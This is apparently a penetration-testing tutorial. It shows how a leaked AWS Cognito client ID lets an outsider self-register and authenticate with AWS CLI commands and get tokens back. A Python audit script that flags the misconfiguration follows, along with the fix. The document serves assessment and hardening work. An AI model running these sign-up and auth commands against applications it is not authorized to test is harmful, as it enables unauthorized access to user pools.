Let’s assume you have gained access to an AWS Cognito Client ID during an assessment. Here we will see how to use that Client ID to register a new user in the application.
Use the following command to sign up a new user.
# aws cognito-idp sign-up --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --username [email protected] --password Cognito-signup-test@1 --region us-east-1 --no-sign-request
{
    "UserConfirmed": false,
    "CodeDeliveryDetails": {
        "Destination": "7***@e***",
        "DeliveryMedium": "EMAIL",
        "AttributeName": "email"
    },
    "UserSub": "98d945d5-543c-4d35-82df-8c5709bbd5a0"
}
After executing the above command, there should be an email in your inbox with an OTP to confirm the sign-up. Now use the following command for confirmation.
# aws cognito-idp confirm-sign-up --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --username [email protected] --confirmation-code 674209 --no-sign-request --region us-east-1
The following command can be used to verify the new user registration.
# aws cognito-idp initiate-auth --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --auth-flow USER_PASSWORD_AUTH --region us-east-1 --auth-parameters 'USERNAME=[email protected],PASSWORD=Cognito-signup-test@1'
{
    "ChallengeParameters": {},
    "AuthenticationResult": {
        "AccessToken": "eyJra...[REMOVED]",
        "ExpiresIn": 3600,
        "TokenType": "Bearer",
        "RefreshToken": "eyJ...[REMOVED]",
        "IdToken": "eyJra...[REMOVED]"
    }
}
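The sign-up above only succeeds when the user pool allows self-registration and the app client has no secret. The following Python check is an added example, not part of the original post: it reads the JSON returned by `aws cognito-idp describe-user-pool` and `aws cognito-idp describe-user-pool-client` and flags those settings. The sample documents and finding names are constructed for illustration.

```python
import json

# Constructed samples (not from a real account), shaped like the output of
# `aws cognito-idp describe-user-pool` and `describe-user-pool-client`.
SAMPLE_POOL = json.loads("""{"UserPool": {"Id": "us-east-1_EXAMPLE",
  "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": false}}}""")
SAMPLE_CLIENT = json.loads("""{"UserPoolClient": {"ClientId": "EXAMPLECLIENTID",
  "ExplicitAuthFlows": ["ALLOW_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH"]}}""")

# Current and legacy names of the flow used by initiate-auth above.
PASSWORD_FLOWS = {"ALLOW_USER_PASSWORD_AUTH", "USER_PASSWORD_AUTH"}


def audit(pool_doc, client_docs):
    """Return (finding_id, detail) tuples for one user pool and its app clients."""
    findings = []
    pool = pool_doc["UserPool"]
    # False (the default) means anyone holding a usable client ID may call SignUp.
    admin_only = pool.get("AdminCreateUserConfig", {}).get("AllowAdminCreateUserOnly", False)
    if not admin_only:
        findings.append(("SELF_SIGNUP_ENABLED", pool["Id"]))
    for doc in client_docs:
        client = doc["UserPoolClient"]
        # ClientSecret is only present when the client was created with a secret;
        # without one, the client ID alone is enough to call the public APIs.
        if not admin_only and "ClientSecret" not in client:
            findings.append(("PUBLIC_CLIENT_CAN_SIGN_UP", client["ClientId"]))
        if PASSWORD_FLOWS & set(client.get("ExplicitAuthFlows", [])):
            findings.append(("PASSWORD_AUTH_FLOW", client["ClientId"]))
    return findings


if __name__ == "__main__":
    for finding_id, detail in audit(SAMPLE_POOL, [SAMPLE_CLIENT]):
        print(f"{finding_id}: {detail}")
```

Where self-registration is not intended, setting `AllowAdminCreateUserOnly` to true on the user pool clears the first two findings.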